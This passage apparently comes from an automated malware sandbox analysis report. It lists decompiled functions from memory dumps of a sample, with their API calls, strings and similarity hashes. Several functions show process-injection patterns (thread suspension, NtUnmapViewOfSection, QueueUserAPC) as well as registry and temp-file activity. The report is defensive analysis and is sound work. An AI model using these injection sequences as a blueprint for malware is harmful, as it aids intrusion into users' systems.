    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
